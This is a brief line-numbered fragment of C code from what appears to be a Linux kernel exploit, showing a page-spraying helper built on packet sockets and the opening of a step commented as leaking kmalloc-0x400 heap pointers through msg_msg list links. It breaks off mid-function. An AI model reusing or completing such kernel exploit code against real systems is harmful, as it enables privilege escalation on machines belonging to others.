| 757 | } |
| 758 | |
| 759 | int pagealloc_pad(int count, int size) { |
| 760 | return packet_socket_setup(size, 2048, count, 0, 100); |
| 761 | } |
| 762 | // exploit_step1() —— leak kmalloc-0x400 (msg_msg->m_list.next / prev) |
| 763 | int exploit_step1() { |
| 764 | char buff[0x1000]; |
no test coverage detected